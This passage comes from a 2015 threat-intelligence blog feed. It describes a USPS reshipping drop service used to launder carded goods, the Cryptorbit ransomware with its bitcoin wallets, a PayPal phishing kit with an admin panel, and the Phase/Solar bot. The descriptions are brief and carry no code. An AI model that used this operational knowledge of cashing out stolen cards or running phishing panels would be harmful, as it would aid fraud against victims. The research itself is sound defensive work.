Hi Benson.</description><link>https://www.xylibox.com/2015/01/alina-sparks-source-code-review.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv4xbT-57XdNPjTduPIc84Tq86H00ICDQ9NAMtOEk2Fgdw-73QFGma8QTcw5rThSFpZcGWodN324r2JMPLLk_LaGTTKrYEjx99B_wEKChrqi22E0PCRpQxutWEh8W0tvyBQCdRKc3mus/s72-c/2015-01-14_10-26-49.png" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5589514687673484136</guid><pubDate>Wed, 14 Jan 2015 09:03:00 +0000</pubDate><atom:updated>2015-01-14T10:03:42.536+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Consuella</category><category domain="http://www.blogger.com/atom/ns#">consuella.net</category><category domain="http://www.blogger.com/atom/ns#">Drop service</category><category domain="http://www.blogger.com/atom/ns#">lampeduza</category><category domain="http://www.blogger.com/atom/ns#">Money laundering</category><category domain="http://www.blogger.com/atom/ns#">Tiberium drop service</category><category domain="http://www.blogger.com/atom/ns#">tiberiy.pro</category><category domain="http://www.blogger.com/atom/ns#">USPS</category><category domain="http://www.blogger.com/atom/ns#">Дроп</category><title>Tiberium/Consuella USPS money laundering service</title><description>&lt;br /&gt;
Consuella was a &#39;USPS drop service&#39; run by one of the Lampeduza administrator.&lt;br /&gt;
This type of service is used to help credit card thieves to &quot;cash out&quot; by sending carded labels service overseas (or not) via USPS.&lt;br /&gt;
They was also constantly recruiting mules in United states to keep addresses in rotation.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqETM_jsgsiuEl3wjFqLUKy1u8XhYt8fLc8NAJI_8tGcZ8MJCSmx-R_dZhVW5Gs4N4GNIQrMnEyRucvxBQbM12rzekVBnDost7EK1ikArKSeGZfceSWq8os3U8TotMwhrTI5mBwUROFz8/s1600/2014-11-09_18-01-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqETM_jsgsiuEl3wjFqLUKy1u8XhYt8fLc8NAJI_8tGcZ8MJCSmx-R_dZhVW5Gs4N4GNIQrMnEyRucvxBQbM12rzekVBnDost7EK1ikArKSeGZfceSWq8os3U8TotMwhrTI5mBwUROFz8/s1600/2014-11-09_18-01-23.png&quot; height=&quot;148&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Here is what look like the service from an admin point of view:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxPAaQxHzpPsqJLMlfwkRc9byS8a1gr3q2vvtSmkbzDw3Rr4tPrHdhwBvJTv4UPl1qSVG6Prd_1AeAC1XlwFE8hKqWxwFXdm2yBLU-0S5rJX3A23d58M6oA4igOyGKiF7DFZeBGMh4TJE/s1600/02-10-2013+11-06-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxPAaQxHzpPsqJLMlfwkRc9byS8a1gr3q2vvtSmkbzDw3Rr4tPrHdhwBvJTv4UPl1qSVG6Prd_1AeAC1XlwFE8hKqWxwFXdm2yBLU-0S5rJX3A23d58M6oA4igOyGKiF7DFZeBGMh4TJE/s1600/02-10-2013+11-06-21.png&quot; height=&quot;288&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjw41KUNhW-BU_Nyi1MD6dZyjUenXVHcEM7ErM74dSdyaPsB_mjtiZ8k7_JfdLdYPXanqfHRhmW7WzG5PLUpkLbBuOLZr03IGK6zUGxDEQMdADkBK9RmtVnlaphlyVvBvSyhY_NM4kEA/s1600/02-10-2013+11-08-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjw41KUNhW-BU_Nyi1MD6dZyjUenXVHcEM7ErM74dSdyaPsB_mjtiZ8k7_JfdLdYPXanqfHRhmW7WzG5PLUpkLbBuOLZr03IGK6zUGxDEQMdADkBK9RmtVnlaphlyVvBvSyhY_NM4kEA/s1600/02-10-2013+11-08-45.png&quot; height=&quot;288&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Add a payement:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNftZc6aQPtbYqfNChRTediYQ2HvAsCgUkOpKN4-E7kfZpJ2RYePGR3NJPr5MU0j_zPIb7aor7c1nO_F3LEKoK4oo2Al8RvKomIDUCAzZamKEitMW1t1qPz5IgKHNb6cCoNMF3IH738tw/s1600/02-10-2013+11-09-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNftZc6aQPtbYqfNChRTediYQ2HvAsCgUkOpKN4-E7kfZpJ2RYePGR3NJPr5MU0j_zPIb7aor7c1nO_F3LEKoK4oo2Al8RvKomIDUCAzZamKEitMW1t1qPz5IgKHNb6cCoNMF3IH738tw/s400/02-10-2013+11-09-45.png&quot; height=&quot;346&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Users:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfa-xRUb_Z8vg6o-yRTFtqSPln67qYOrcn2K-ueuOSVlIx8ZB0Cbpih61X1LTJqxqhX3FEcgt61cyJ9HVFTCkrMGXG8vJYoxGYolIpTiT-E0GtB38IDxAs5ueYYKD5Hiir0ex9GiUAegM/s1600/02-10-2013+11-12-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfa-xRUb_Z8vg6o-yRTFtqSPln67qYOrcn2K-ueuOSVlIx8ZB0Cbpih61X1LTJqxqhX3FEcgt61cyJ9HVFTCkrMGXG8vJYoxGYolIpTiT-E0GtB38IDxAs5ueYYKD5Hiir0ex9GiUAegM/s400/02-10-2013+11-12-06.png&quot; height=&quot;400&quot; width=&quot;363&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Supports:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF47KfJ3kT-o1oJdxTPddhuGSng_QGKX0iEvYcxOksu4C3mTjV-LL4g40NS7VKja_yNsonP_HlkvLar2h_BLwVBSyEl4Q7zpIDMP2qhvlRFiBZxFnEIs5P16amBXkTXMdPiCF6CsV5DS8/s1600/02-10-2013+11-13-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF47KfJ3kT-o1oJdxTPddhuGSng_QGKX0iEvYcxOksu4C3mTjV-LL4g40NS7VKja_yNsonP_HlkvLar2h_BLwVBSyEl4Q7zpIDMP2qhvlRFiBZxFnEIs5P16amBXkTXMdPiCF6CsV5DS8/s400/02-10-2013+11-13-06.png&quot; height=&quot;165&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
News:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXguSDl8JM5yv8QREVbNQdn8uZHB2uigsgdas-929MdFxDN0gZJokYxoRHLd8FCeZwPZc3gmeCgGbExAsbSOsGRd2yu_l8Os3GefU2crHFzNBkLKAm8k5LPemq3TnuhpnRm73gIZ21Wms/s1600/02-10-2013+11-15-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXguSDl8JM5yv8QREVbNQdn8uZHB2uigsgdas-929MdFxDN0gZJokYxoRHLd8FCeZwPZc3gmeCgGbExAsbSOsGRd2yu_l8Os3GefU2crHFzNBkLKAm8k5LPemq3TnuhpnRm73gIZ21Wms/s400/02-10-2013+11-15-37.png&quot; height=&quot;313&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjxYrHNX7cLg93v6AhAdT-awV34VOh_mZwtor3U-UnQYDvDQO_mG6vTTEWir0_tzAz5mpyhe1ONIBYCHMPHKEQbP09Z9EGjuYBp-k_eho9-Fl39VsTpRPeIWBW1Y8Z_9YqhuVszl7n-ko/s1600/02-10-2013+11-16-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjxYrHNX7cLg93v6AhAdT-awV34VOh_mZwtor3U-UnQYDvDQO_mG6vTTEWir0_tzAz5mpyhe1ONIBYCHMPHKEQbP09Z9EGjuYBp-k_eho9-Fl39VsTpRPeIWBW1Y8Z_9YqhuVszl7n-ko/s400/02-10-2013+11-16-34.png&quot; height=&quot;221&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Although Consuella was incredibly simple compared to others drop-shipping service such as addtrack.biz and pac-man.co who had fake website for mules on the panel.</description><link>https://www.xylibox.com/2015/01/tiberiumconsuella-usps-money-laundering.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqETM_jsgsiuEl3wjFqLUKy1u8XhYt8fLc8NAJI_8tGcZ8MJCSmx-R_dZhVW5Gs4N4GNIQrMnEyRucvxBQbM12rzekVBnDost7EK1ikArKSeGZfceSWq8os3U8TotMwhrTI5mBwUROFz8/s72-c/2014-11-09_18-01-23.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-1688769849464994081</guid><pubDate>Tue, 13 Jan 2015 00:53:00 +0000</pubDate><atom:updated>2015-01-13T01:53:27.476+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Cryptorbit</category><title>Cryptorbit locker</title><description>When Cryptorbit ransomware was targeting people i&#39;ve visited them&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifDoM71JiWtjrUWHgPX_Yg7iCuHrLAJg4Xw8TJ26NupLcElDwKtdkx6-6O2MNkQ5E5VVwv9f7wulnUXmYVyrQN9QvTzswPAN0lzeB-umcKHoGJ-VKMWdlVUe9E8SYDpfNfHQKRa-gcEeU/s1600/23-01-2014+15-03-36.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifDoM71JiWtjrUWHgPX_Yg7iCuHrLAJg4Xw8TJ26NupLcElDwKtdkx6-6O2MNkQ5E5VVwv9f7wulnUXmYVyrQN9QvTzswPAN0lzeB-umcKHoGJ-VKMWdlVUe9E8SYDpfNfHQKRa-gcEeU/s1600/23-01-2014+15-03-36.png&quot; height=&quot;396&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
SQL database:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjilr4NhkvkSm-EKXGJXgY74UL2g4YCsSPKWtTxCo4F4TH1rYkMXcyZz6nNIMNMDeylmdwWCO_iaUPeefVV7fBKODBSjdrFNN-71eeaAROzEWt-7C5Gv74AwR5h8If5zMtNdvsc0lZnmD4/s1600/23-01-2014+15-12-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjilr4NhkvkSm-EKXGJXgY74UL2g4YCsSPKWtTxCo4F4TH1rYkMXcyZz6nNIMNMDeylmdwWCO_iaUPeefVV7fBKODBSjdrFNN-71eeaAROzEWt-7C5Gv74AwR5h8If5zMtNdvsc0lZnmD4/s1600/23-01-2014+15-12-38.png&quot; height=&quot;350&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bad guy wallets:&lt;br /&gt;
&lt;a href=&quot;https://blockchain.info/address/1H6jc6Mz535zTts6DWdeJf3HdH4owGjsXo&quot;&gt;1H6jc6Mz535zTts6DWdeJf3HdH4owGjsXo&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://blockchain.info/address/15JTKDkU4U6Tn5MBc9Pt52mMzXDmvmaanR&quot;&gt;15JTKDkU4U6Tn5MBc9Pt52mMzXDmvmaanR&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://blockchain.info/address/18yP3oKzeqChWCYG2ZGPcBhMQBiXFeR2GF&quot;&gt;18yP3oKzeqChWCYG2ZGPcBhMQBiXFeR2GF&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://blockchain.info/address/17FSkXDULjtK6R9G3cpwmLMYbWRZJ9c8vZ&quot;&gt;17FSkXDULjtK6R9G3cpwmLMYbWRZJ9c8vZ&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://blockchain.info/address/1KZvxpPzvkSCqm3VTffWBWcLumWK1KJfkK&quot;&gt;1KZvxpPzvkSCqm3VTffWBWcLumWK1KJfkK&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Pseudo decryptor ~ &lt;a href=&quot;https://www.virustotal.com/en/file/e9014cb213ec5d73d4327205d457c93ca9c74bcd29dc2b47d2f7c8b09306be84/analysis/1390479428/&quot;&gt;4a8e11468649e045976574691cf53732&lt;/a&gt;</description><link>https://www.xylibox.com/2015/01/cryptorbit-locker.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifDoM71JiWtjrUWHgPX_Yg7iCuHrLAJg4Xw8TJ26NupLcElDwKtdkx6-6O2MNkQ5E5VVwv9f7wulnUXmYVyrQN9QvTzswPAN0lzeB-umcKHoGJ-VKMWdlVUe9E8SYDpfNfHQKRa-gcEeU/s72-c/23-01-2014+15-03-36.png" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5299288915440189345</guid><pubDate>Tue, 13 Jan 2015 00:49:00 +0000</pubDate><atom:updated>2015-01-13T01:49:02.051+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Captain Barbarossa</category><category domain="http://www.blogger.com/atom/ns#">Paypal</category><category domain="http://www.blogger.com/atom/ns#">phishing</category><category domain="http://www.blogger.com/atom/ns#">Phishing kit</category><title>Captain Barbarossa</title><description>Captain Barbarossa, is used for Paypal phishing and sold as phishing kit, the kit include an admin panel.&lt;br /&gt;
User is tricked with a fake Paypal login asking for details, here in German:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUb1RMVCa64Rt2TB6ZikCw_B7Tgr6xLDHCXn2XywOBQoJyEbP03x7ai0TnefS-0qDK8i6uc0N8kxQVM1RZx2QpUOu2QKDabQhjq1jXXJt9xlELoM10OEDQAy0ZCqxNxR5jBeCqCksF8U4/s1600/2014-11-09_16-14-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUb1RMVCa64Rt2TB6ZikCw_B7Tgr6xLDHCXn2XywOBQoJyEbP03x7ai0TnefS-0qDK8i6uc0N8kxQVM1RZx2QpUOu2QKDabQhjq1jXXJt9xlELoM10OEDQAy0ZCqxNxR5jBeCqCksF8U4/s1600/2014-11-09_16-14-31.png&quot; height=&quot;365&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY5TFeFluRs6AOG4FgP5W8dT_6NQt3YpedjAO_OG71a-uSU7PrqMj3M8aaZE4H_nXcrLXb3Xojw0JQ-b-4cSwR7D10U9kPxTPWxZp618H_nn9mCLzj_YZJcM_tv6YgTCCT7fS8f2Pyop4/s1600/2014-11-09_16-16-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY5TFeFluRs6AOG4FgP5W8dT_6NQt3YpedjAO_OG71a-uSU7PrqMj3M8aaZE4H_nXcrLXb3Xojw0JQ-b-4cSwR7D10U9kPxTPWxZp618H_nn9mCLzj_YZJcM_tv6YgTCCT7fS8f2Pyop4/s1600/2014-11-09_16-16-20.png&quot; height=&quot;218&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABkxC79wCS2JUsiPe0GJ5_LbgJ01yV4GfPJBhqMkz8LCPeQJvEuvBiV_pTUTVyr8bZuhw9GrW8-zf8NR_PNTvJ2P2HpOkwU6kPnHuaT8MCGjmYII77VtOEsgr-eGkfxr-lwwPn2wNSII/s1600/2014-11-09_16-16-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABkxC79wCS2JUsiPe0GJ5_LbgJ01yV4GfPJBhqMkz8LCPeQJvEuvBiV_pTUTVyr8bZuhw9GrW8-zf8NR_PNTvJ2P2HpOkwU6kPnHuaT8MCGjmYII77VtOEsgr-eGkfxr-lwwPn2wNSII/s1600/2014-11-09_16-16-43.png&quot; height=&quot;218&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Once infos are transmitted the datas are sent to the panel.&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6SO44Fv1ntt0DXvyS7aPgxOhZPeg54Jzrd5rpgbef7c1efnM-NcujlGC3edHLlCLaRe6EAI7N4cX2K5H0HgSZzEEZmhJA9FaqFOnKp_gofWX9iqypXXhHIofWtDmeM0XU02NgDquTEA/s1600/2014-11-09_16-08-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6SO44Fv1ntt0DXvyS7aPgxOhZPeg54Jzrd5rpgbef7c1efnM-NcujlGC3edHLlCLaRe6EAI7N4cX2K5H0HgSZzEEZmhJA9FaqFOnKp_gofWX9iqypXXhHIofWtDmeM0XU02NgDquTEA/s1600/2014-11-09_16-08-07.png&quot; height=&quot;400&quot; width=&quot;265&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Main:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFqqmoiFcGfxq-wTv6ofQM_sHKtV7e6ALnkSM8BEnZWz_XZ2sx1_i8HUwS0AkPEEzfMRGvsZWagRidxEwYDey4ZdfvxV2kzXWfoN_ZArBj76ikwAQBnfcKls6OHjcY764iZfnWW9GG2pQ/s1600/2014-11-09_16-09-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFqqmoiFcGfxq-wTv6ofQM_sHKtV7e6ALnkSM8BEnZWz_XZ2sx1_i8HUwS0AkPEEzfMRGvsZWagRidxEwYDey4ZdfvxV2kzXWfoN_ZArBj76ikwAQBnfcKls6OHjcY764iZfnWW9GG2pQ/s1600/2014-11-09_16-09-59.png&quot; height=&quot;283&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Log manager:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0wR2ZF-FiAkWCkYxY1O62GsyItTpItf0vD6XPErcnRXbW-3O8o45qLChFaElpwg1EM6P_M5dtj7AEHljQY0cYXhZLjwPuIPn8F6RMUQ1eYF4W4-o6k5tIUKv1sEsKJjyppW4UhERi2c8/s1600/2014-11-09_16-11-32.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0wR2ZF-FiAkWCkYxY1O62GsyItTpItf0vD6XPErcnRXbW-3O8o45qLChFaElpwg1EM6P_M5dtj7AEHljQY0cYXhZLjwPuIPn8F6RMUQ1eYF4W4-o6k5tIUKv1sEsKJjyppW4UhERi2c8/s1600/2014-11-09_16-11-32.png&quot; height=&quot;268&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2015/01/captain-barbarossa.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUb1RMVCa64Rt2TB6ZikCw_B7Tgr6xLDHCXn2XywOBQoJyEbP03x7ai0TnefS-0qDK8i6uc0N8kxQVM1RZx2QpUOu2QKDabQhjq1jXXJt9xlELoM10OEDQAy0ZCqxNxR5jBeCqCksF8U4/s72-c/2014-11-09_16-14-31.png" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-1174706035477904326</guid><pubDate>Mon, 12 Jan 2015 20:48:00 +0000</pubDate><atom:updated>2015-01-12T21:48:37.563+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Napolar</category><category domain="http://www.blogger.com/atom/ns#">Phase</category><category domain="http://www.blogger.com/atom/ns#">Solar</category><title>Phase (Win32/PhaseBot-A)</title><description>Small write-up about &#39;Phase&#39; a malware who appeared and vanished very rapidly.&lt;br /&gt;
I had a look on it with MalwareTech who wrote &lt;a href=&quot;http://www.malwaretech.com/search?q=Phase%20Bot&quot;&gt;several stories&lt;/a&gt;, it was shown that Phase is in reality a &#39;new&#39; version of Solar bot, at least not so new, the code is so copy/pasted that even Antivirus such as Avast do false positives and now detect Napolar (Solar) as PhaseBot.&lt;br /&gt;
&lt;br /&gt;
Advert:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0JheIjlO2Yj0mTQFhMmc80QXWJiZ_qydp4tvfH5f7KO533rzHLUTD79ti_SYafZm8O6_-xqHGY994vVK5NohU1-5Ei2Y4OtYSn0wIm487UOd-IRZZrJafaKbvgKGnlr3gyQdOM9JPDO4/s1600/2014-12-09_18-52-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0JheIjlO2Yj0mTQFhMmc80QXWJiZ_qydp4tvfH5f7KO533rzHLUTD79ti_SYafZm8O6_-xqHGY994vVK5NohU1-5Ei2Y4OtYSn0wIm487UOd-IRZZrJafaKbvgKGnlr3gyQdOM9JPDO4/s1600/2014-12-09_18-52-06.png&quot; height=&quot;238&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Phase support website:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvXVfvMuCAWMpuyHhjqeyI_dGjh37Xc-HF4NLM9aAx7uLDlaNNNGCVhfdCNBngKrJAsFCD7pkWoicbwI2I20z87iNaEiTk7y5DxRCmTxOdNslKiDakz6R8zpx3PN_ufCS7mexbfrKuCA/s1600/2014-12-22_13-01-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvXVfvMuCAWMpuyHhjqeyI_dGjh37Xc-HF4NLM9aAx7uLDlaNNNGCVhfdCNBngKrJAsFCD7pkWoicbwI2I20z87iNaEiTk7y5DxRCmTxOdNslKiDakz6R8zpx3PN_ufCS7mexbfrKuCA/s1600/2014-12-22_13-01-59.png&quot; height=&quot;255&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
The coder is using public snippet for chatting with customers:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKP17tpdizbqwwehxo0ypuxfOLEW-Osfqg96BfpRHRqT7y8oJI38zOCSDlFC4D5hurwP7eH5TLHY5VJ5c3IktyKFG_gbGjEDl3yXvcR2cJktr_RvWVZ1L4NuMNpzgaE-51u4iiXYNl8A/s1600/2014-12-13_11-29-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKP17tpdizbqwwehxo0ypuxfOLEW-Osfqg96BfpRHRqT7y8oJI38zOCSDlFC4D5hurwP7eH5TLHY5VJ5c3IktyKFG_gbGjEDl3yXvcR2cJktr_RvWVZ1L4NuMNpzgaE-51u4iiXYNl8A/s1600/2014-12-13_11-29-40.png&quot; height=&quot;382&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
